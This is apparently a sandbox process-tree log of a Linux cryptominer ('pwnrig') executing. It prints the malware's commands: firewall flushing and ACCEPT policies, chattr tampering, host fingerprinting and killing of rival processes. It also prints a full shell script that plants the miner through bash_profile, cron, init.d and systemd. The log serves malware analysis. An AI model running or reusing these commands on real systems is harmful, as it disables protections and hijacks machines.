-
/usr/sbin/ufwufw disable3⤵PID:2521
-
/usr/sbin/iptables/usr/sbin/iptables -V4⤵
- Flushes firewall rules
PID:2522
-
-
/lib/ufw/ufw-init/lib/ufw/ufw-init force-stop4⤵
- Attempts to change immutable files
PID:2523 -
/sbin/ip6tablesip6tables -L INPUT -n5⤵
- Flushes firewall rules
PID:2524
-
-
/sbin/iptablesiptables -F ufw-logging-deny5⤵PID:2525
-
-
/sbin/iptablesiptables -F ufw-logging-allow5⤵PID:2526
-
-
/sbin/iptablesiptables -F ufw-not-local5⤵PID:2527
-
-
/sbin/iptablesiptables -F ufw-user-logging-input5⤵
- Flushes firewall rules
PID:2528
-
-
/sbin/iptablesiptables -F ufw-user-limit-accept5⤵PID:2529
-
-
/sbin/iptablesiptables -F ufw-user-limit5⤵PID:2530
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-input5⤵PID:2531
-
-
/sbin/iptablesiptables -F ufw-reject-input5⤵PID:2532
-
-
/sbin/iptablesiptables -F ufw-after-logging-input5⤵PID:2533
-
-
/sbin/iptablesiptables -F ufw-after-input5⤵PID:2534
-
-
/sbin/iptablesiptables -F ufw-user-input5⤵PID:2535
-
-
/sbin/iptablesiptables -F ufw-before-input5⤵PID:2536
-
-
/sbin/iptablesiptables -F ufw-before-logging-input5⤵
- Attempts to change immutable files
PID:2537
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-forward5⤵PID:2538
-
-
/sbin/iptablesiptables -F ufw-reject-forward5⤵
- Flushes firewall rules
PID:2539
-
-
/sbin/iptablesiptables -F ufw-after-logging-forward5⤵PID:2540
-
-
/sbin/iptablesiptables -F ufw-after-forward5⤵PID:2541
-
-
/sbin/iptablesiptables -F ufw-user-logging-forward5⤵
- Flushes firewall rules
PID:2542
-
-
/sbin/iptablesiptables -F ufw-user-forward5⤵PID:2543
-
-
/sbin/iptablesiptables -F ufw-before-forward5⤵PID:2544
-
-
/sbin/iptablesiptables -F ufw-before-logging-forward5⤵PID:2545
-
-
/sbin/iptablesiptables -F ufw-track-forward5⤵
- Flushes firewall rules
PID:2546
-
-
/sbin/iptablesiptables -F ufw-track-output5⤵PID:2547
-
-
/sbin/iptablesiptables -F ufw-track-input5⤵
- Flushes firewall rules
PID:2548
-
-
/sbin/iptablesiptables -F ufw-skip-to-policy-output5⤵
- Flushes firewall rules
PID:2549
-
-
/sbin/iptablesiptables -F ufw-reject-output5⤵PID:2550
-
-
/sbin/iptablesiptables -F ufw-after-logging-output5⤵PID:2551
-
-
/sbin/iptablesiptables -F ufw-after-output5⤵
- Flushes firewall rules
PID:2552
-
-
/sbin/iptablesiptables -F ufw-user-logging-output5⤵PID:2553
-
-
/sbin/iptablesiptables -F ufw-user-output5⤵PID:2554
-
-
/sbin/iptablesiptables -F ufw-before-output5⤵PID:2555
-
-
/sbin/iptablesiptables -F ufw-before-logging-output5⤵PID:2556
-
-
/sbin/iptablesiptables -Z ufw-logging-deny5⤵
- Flushes firewall rules
PID:2557
-
-
/sbin/iptablesiptables -Z ufw-logging-allow5⤵
- Flushes firewall rules
PID:2558
-
-
/sbin/iptablesiptables -Z ufw-not-local5⤵
- Flushes firewall rules
PID:2559
-
-
/sbin/iptablesiptables -Z ufw-user-logging-input5⤵
- Attempts to change immutable files
PID:2560
-
-
/sbin/iptablesiptables -Z ufw-user-limit-accept5⤵PID:2561
-
-
/sbin/iptablesiptables -Z ufw-user-limit5⤵PID:2562
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-input5⤵
- Attempts to change immutable files
PID:2563
-
-
/sbin/iptablesiptables -Z ufw-reject-input5⤵
- Flushes firewall rules
PID:2564
-
-
/sbin/iptablesiptables -Z ufw-after-logging-input5⤵PID:2565
-
-
/sbin/iptablesiptables -Z ufw-after-input5⤵PID:2566
-
-
/sbin/iptablesiptables -Z ufw-user-input5⤵PID:2567
-
-
/sbin/iptablesiptables -Z ufw-before-input5⤵PID:2568
-
-
/sbin/iptablesiptables -Z ufw-before-logging-input5⤵
- Flushes firewall rules
PID:2569
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-forward5⤵
- Flushes firewall rules
PID:2570
-
-
/sbin/iptablesiptables -Z ufw-reject-forward5⤵
- Flushes firewall rules
PID:2571
-
-
/sbin/iptablesiptables -Z ufw-after-logging-forward5⤵PID:2572
-
-
/sbin/iptablesiptables -Z ufw-after-forward5⤵
- Flushes firewall rules
PID:2573
-
-
/sbin/iptablesiptables -Z ufw-user-logging-forward5⤵PID:2574
-
-
/sbin/iptablesiptables -Z ufw-user-forward5⤵
- Flushes firewall rules
PID:2575
-
-
/sbin/iptablesiptables -Z ufw-before-forward5⤵PID:2576
-
-
/sbin/iptablesiptables -Z ufw-before-logging-forward5⤵PID:2577
-
-
/sbin/iptablesiptables -Z ufw-track-forward5⤵
- Flushes firewall rules
PID:2578
-
-
/sbin/iptablesiptables -Z ufw-track-output5⤵PID:2579
-
-
/sbin/iptablesiptables -Z ufw-track-input5⤵PID:2580
-
-
/sbin/iptablesiptables -Z ufw-skip-to-policy-output5⤵PID:2581
-
-
/sbin/iptablesiptables -Z ufw-reject-output5⤵PID:2582
-
-
/sbin/iptablesiptables -Z ufw-after-logging-output5⤵
- Flushes firewall rules
PID:2583
-
-
/sbin/iptablesiptables -Z ufw-after-output5⤵PID:2584
-
-
/sbin/iptablesiptables -Z ufw-user-logging-output5⤵PID:2585
-
-
/sbin/iptablesiptables -Z ufw-user-output5⤵
- Flushes firewall rules
PID:2586
-
-
/sbin/iptablesiptables -Z ufw-before-output5⤵PID:2587
-
-
/sbin/iptablesiptables -Z ufw-before-logging-output5⤵PID:2588
-
-
/sbin/iptablesiptables -X ufw-logging-deny5⤵
- Flushes firewall rules
PID:2589
-
-
/sbin/iptablesiptables -X ufw-logging-allow5⤵
- Flushes firewall rules
PID:2590
-
-
/sbin/iptablesiptables -X ufw-not-local5⤵PID:2591
-
-
/sbin/iptablesiptables -X ufw-user-logging-input5⤵PID:2592
-
-
/sbin/iptablesiptables -X ufw-user-logging-output5⤵PID:2593
-
-
/sbin/iptablesiptables -X ufw-user-logging-forward5⤵
- Flushes firewall rules
PID:2594
-
-
/sbin/iptablesiptables -X ufw-user-limit-accept5⤵PID:2595
-
-
/sbin/iptablesiptables -X ufw-user-limit5⤵
- Flushes firewall rules
PID:2596
-
-
/sbin/iptablesiptables -X ufw-user-input5⤵
- Flushes firewall rules
PID:2597
-
-
/sbin/iptablesiptables -X ufw-user-forward5⤵
- Flushes firewall rules
PID:2598
-
-
/sbin/iptablesiptables -X ufw-user-output5⤵
- Flushes firewall rules
PID:2599
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-input5⤵PID:2600
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-output5⤵PID:2601
-
-
/sbin/iptablesiptables -X ufw-skip-to-policy-forward5⤵PID:2602
-
-
/sbin/iptablesiptables -P INPUT ACCEPT5⤵
- Flushes firewall rules
PID:2603
-
-
/sbin/iptablesiptables -P OUTPUT ACCEPT5⤵
- Flushes firewall rules
PID:2604
-
-
/sbin/iptablesiptables -P FORWARD ACCEPT5⤵PID:2605
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-deny5⤵
- Flushes firewall rules
PID:2606
-
-
/sbin/ip6tablesip6tables -F ufw6-logging-allow5⤵
- Flushes firewall rules
PID:2607
-
-
/sbin/ip6tablesip6tables -F ufw6-not-local5⤵
- Flushes firewall rules
PID:2608
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-input5⤵PID:2609
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit-accept5⤵PID:2610
-
-
/sbin/ip6tablesip6tables -F ufw6-user-limit5⤵PID:2611
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-input5⤵PID:2612
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-input5⤵PID:2613
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-input5⤵
- Attempts to change immutable files
PID:2614
-
-
/sbin/ip6tablesip6tables -F ufw6-after-input5⤵
- Flushes firewall rules
PID:2615
-
-
/sbin/ip6tablesip6tables -F ufw6-user-input5⤵
- Attempts to change immutable files
PID:2616
-
-
/sbin/ip6tablesip6tables -F ufw6-before-input5⤵PID:2617
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-input5⤵
- Attempts to change immutable files
PID:2618
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-forward5⤵PID:2619
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-forward5⤵PID:2620
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-forward5⤵PID:2621
-
-
/sbin/ip6tablesip6tables -F ufw6-after-forward5⤵
- Flushes firewall rules
PID:2622
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-forward5⤵PID:2623
-
-
/sbin/ip6tablesip6tables -F ufw6-user-forward5⤵PID:2624
-
-
/sbin/ip6tablesip6tables -F ufw6-before-forward5⤵PID:2625
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-forward5⤵PID:2626
-
-
/sbin/ip6tablesip6tables -F ufw6-track-forward5⤵PID:2627
-
-
/sbin/ip6tablesip6tables -F ufw6-track-output5⤵
- Flushes firewall rules
PID:2628
-
-
/sbin/ip6tablesip6tables -F ufw6-track-input5⤵
- Flushes firewall rules
PID:2629
-
-
/sbin/ip6tablesip6tables -F ufw6-skip-to-policy-output5⤵
- Flushes firewall rules
PID:2630
-
-
/sbin/ip6tablesip6tables -F ufw6-reject-output5⤵PID:2631
-
-
/sbin/ip6tablesip6tables -F ufw6-after-logging-output5⤵
- Flushes firewall rules
PID:2632
-
-
/sbin/ip6tablesip6tables -F ufw6-after-output5⤵PID:2633
-
-
/sbin/ip6tablesip6tables -F ufw6-user-logging-output5⤵
- Flushes firewall rules
PID:2634
-
-
/sbin/ip6tablesip6tables -F ufw6-user-output5⤵
- Flushes firewall rules
PID:2635
-
-
/sbin/ip6tablesip6tables -F ufw6-before-output5⤵PID:2636
-
-
/sbin/ip6tablesip6tables -F ufw6-before-logging-output5⤵
- Flushes firewall rules
PID:2637
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-deny5⤵PID:2638
-
-
/sbin/ip6tablesip6tables -Z ufw6-logging-allow5⤵PID:2639
-
-
/sbin/ip6tablesip6tables -Z ufw6-not-local5⤵PID:2640
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-input5⤵
- Attempts to change immutable files
PID:2641
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit-accept5⤵
- Flushes firewall rules
PID:2642
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-limit5⤵
- Flushes firewall rules
PID:2643
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-input5⤵PID:2644
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-input5⤵PID:2645
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-input5⤵
- Flushes firewall rules
PID:2646
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-input5⤵
- Attempts to change immutable files
PID:2647
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-input5⤵PID:2648
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-input5⤵
- Flushes firewall rules
PID:2649
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-input5⤵
- Flushes firewall rules
PID:2650
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-forward5⤵
- Flushes firewall rules
PID:2651
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-forward5⤵PID:2652
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-forward5⤵PID:2653
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-forward5⤵PID:2654
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-forward5⤵PID:2655
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-forward5⤵
- Flushes firewall rules
PID:2656
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-forward5⤵
- Flushes firewall rules
PID:2657
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-forward5⤵PID:2658
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-forward5⤵PID:2659
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-output5⤵
- Flushes firewall rules
PID:2660
-
-
/sbin/ip6tablesip6tables -Z ufw6-track-input5⤵PID:2661
-
-
/sbin/ip6tablesip6tables -Z ufw6-skip-to-policy-output5⤵PID:2662
-
-
/sbin/ip6tablesip6tables -Z ufw6-reject-output5⤵PID:2663
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-logging-output5⤵PID:2664
-
-
/sbin/ip6tablesip6tables -Z ufw6-after-output5⤵PID:2665
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-logging-output5⤵PID:2666
-
-
/sbin/ip6tablesip6tables -Z ufw6-user-output5⤵PID:2667
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-output5⤵PID:2668
-
-
/sbin/ip6tablesip6tables -Z ufw6-before-logging-output5⤵PID:2669
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-deny5⤵
- Flushes firewall rules
PID:2670
-
-
/sbin/ip6tablesip6tables -X ufw6-logging-allow5⤵
- Flushes firewall rules
PID:2671
-
-
/sbin/ip6tablesip6tables -X ufw6-not-local5⤵PID:2672
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-input5⤵PID:2673
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-output5⤵
- Flushes firewall rules
PID:2674
-
-
/sbin/ip6tablesip6tables -X ufw6-user-logging-forward5⤵PID:2675
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit-accept5⤵PID:2676
-
-
/sbin/ip6tablesip6tables -X ufw6-user-limit5⤵PID:2677
-
-
/sbin/ip6tablesip6tables -X ufw6-user-input5⤵
- Attempts to change immutable files
PID:2678
-
-
/sbin/ip6tablesip6tables -X ufw6-user-forward5⤵
- Flushes firewall rules
PID:2679
-
-
/sbin/ip6tablesip6tables -X ufw6-user-output5⤵
- Flushes firewall rules
PID:2680
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-input5⤵PID:2681
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-output5⤵
- Flushes firewall rules
PID:2682
-
-
/sbin/ip6tablesip6tables -X ufw6-skip-to-policy-forward5⤵
- Flushes firewall rules
PID:2683
-
-
/sbin/ip6tablesip6tables -P INPUT ACCEPT5⤵PID:2684
-
-
/sbin/ip6tablesip6tables -P OUTPUT ACCEPT5⤵
- Flushes firewall rules
PID:2685
-
-
/sbin/ip6tablesip6tables -P FORWARD ACCEPT5⤵PID:2686
-
-
-
-
/usr/bin/bashbash -c "iptables -P INPUT ACCEPT"3⤵PID:2687
-
-
/usr/sbin/iptablesiptables -P INPUT ACCEPT3⤵
- Flushes firewall rules
PID:2687
-
-
/usr/bin/bashbash -c "iptables -P OUTPUT ACCEPT"3⤵PID:2688
-
-
/usr/sbin/iptablesiptables -P OUTPUT ACCEPT3⤵PID:2688
-
-
/usr/bin/bashbash -c "iptables -P FORWARD ACCEPT"3⤵PID:2689
-
-
/usr/sbin/iptablesiptables -P FORWARD ACCEPT3⤵
- Flushes firewall rules
PID:2689
-
-
/usr/bin/bashbash -c "iptables -F"3⤵PID:2690
-
-
/usr/sbin/iptablesiptables -F3⤵PID:2690
-
-
/usr/bin/bashbash -c "chattr -ia /etc/ld.so.preload"3⤵PID:2691
-
-
/usr/bin/chattrchattr -ia /etc/ld.so.preload3⤵PID:2691
-
-
/usr/bin/pgreppgrep -f klibsystem43⤵
- Reads CPU attributes
- Reads runtime system information
PID:2692
-
-
/usr/bin/pgreppgrep -f klibsystem53⤵
- Reads CPU attributes
PID:2693
-
-
-
/usr/bin/nohupnohup ./klibsystem51⤵PID:1711
-
/usr/bin/klibsystem5./klibsystem51⤵PID:1711
-
/usr/bin/pkillpkill -f .klibsystem41⤵
- Reads CPU attributes
PID:1958
-
/usr/bin/bashbash -c "echo \"* * * * * /run/user/.klibsystem5 >/dev/null 2>&1\" | crontab -"1⤵PID:1959
-
/usr/bin/crontabcrontab -2⤵
- Creates/modifies Cron job
PID:1961
-
-
/usr/bin/chattrchattr +ia /etc/cron.d/.lib-knlib41⤵PID:1962
-
/usr/bin/chattrchattr +ia /var/spool/cron/.lib-knlib41⤵PID:1963
-
/usr/bin/chattrchattr +ia /etc/cron.hourly/.lib-knlib41⤵
- Attempts to change immutable files
PID:1964
-
/usr/bin/chattrchattr +ia /etc/cron.daily/.lib-knlib41⤵PID:1965
-
/usr/bin/chattrchattr +ia /etc/cron.weekly/.lib-knlib41⤵
- Attempts to change immutable files
PID:1966
-
/usr/bin/chattrchattr +ia /etc/cron.monthly/.lib-knlib41⤵PID:1967
-
/usr/bin/chattrchattr -ia /etc/anacrontab1⤵PID:1968
-
/usr/bin/chattrchattr +ia /etc/anacrontab1⤵PID:1969
-
/tmp/sys-helper/tmp/sys-helper1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:1970
-
/tmp/service-agent/tmp/service-agent -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn1⤵
- Executes dropped EXE
- Checks CPU configuration
- Checks hardware identifiers (DMI)
- Reads CPU attributes
- Reads hardware information
- Enumerates kernel/hardware configuration
PID:1972 -
/bin/shsh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""2⤵PID:1973
-
/usr/bin/whoamiwhoami3⤵PID:1984
-
-
/usr/bin/hostnamehostname3⤵PID:1985
-
-
/usr/bin/grepgrep -c "^processor" /proc/cpuinfo3⤵
- Checks CPU configuration
PID:1986
-
-
-
/bin/shsh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"2⤵PID:2002
-
/usr/bin/awkawk "/[zZ]/ && !a[\$2]++ {print \$2}"3⤵PID:2004
-
-
/usr/bin/psps -A "-ostat,ppid"3⤵
- Reads CPU attributes
- Reads runtime system information
PID:2003
-
-
/usr/bin/idid -u3⤵PID:2006
-
-
/usr/bin/grepgrep -v grep3⤵PID:2009
-
-
/usr/bin/grepgrep /etc/cron3⤵PID:2008
-
-
/usr/bin/psps x3⤵
- Reads CPU attributes
PID:2007
-
-
-
/bin/shsh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/service-agent';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"2⤵
- Writes file to tmp directory
PID:2011 -
/usr/bin/idid -u3⤵PID:2012
-
-
/usr/bin/idid -u3⤵PID:2013
-
-
/usr/bin/chattrchattr -i -a /bin/bprofr "~/.bash_profile"3⤵PID:2014
-
-
/usr/bin/rmrm -rf /bin/bprofr3⤵PID:2015
-
-
/usr/bin/sedsed -i /bprofr/d "~/.bash_profile"3⤵PID:2016
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/bprofr3⤵
- Writes file to system bin folder
PID:2017
-
-
/usr/bin/idid -u3⤵PID:2018
-
-
/usr/bin/chattrchattr +i +a /bin/bprofr "~/.bash_profile"3⤵PID:2019
-
-
/usr/bin/mkdirmkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly3⤵PID:2020
-
-
/usr/bin/chattrchattr -i -a "/etc/cron.*/pwnrig" /bin/crondr3⤵PID:2021
-
-
/usr/bin/rmrm -rf /bin/crondr3⤵PID:2022
-
-
/usr/bin/cpcp -f -r -- /tmp/service-agent /bin/crondr3⤵
- Writes file to system bin folder
PID:2023
-
-
/usr/bin/teetee /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2025
-
-
/usr/bin/sedsed -i "1 s/-e //" /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig3⤵
- Creates/modifies Cron job
PID:2026
-
-
/usr/bin/chmodchmod +x /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2027
-
-
/usr/bin/chattrchattr +i +a /etc/cron.d/pwnrig /etc/cron.daily/pwnrig /etc/cron.hourly/pwnrig /etc/cron.monthly/pwnrig /etc/cron.weekly/pwnrig /bin/crondr3⤵PID:2028
-
-
/usr/bin/whichwhich chkconfig3⤵PID:2029
-
-
/usr/bin/whichwhich update-rc.d3⤵PID:2030
-
-
/usr/bin/chattrchattr -i -a /etc/init.d/pwnrig /bin/initdr3⤵PID:2031
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig disable3⤵
- Flushes firewall rules
PID:2032
-
-
/usr/sbin/update-rc.dupdate-rc.d -f pwnrig remove3⤵PID:2033
-
/usr/local/sbin/systemctlsystemctl daemon-reload4⤵PID:2034
-
-
/usr/local/bin/systemctlsystemctl daemon-reload4⤵PID:2034
-
-
/usr/sbin/systemctlsystemctl daemon-reload4⤵PID:2034
-
-
/usr/bin/systemctlsystemctl daemon-reload4⤵
- Reads EFI boot settings
PID:2034
-
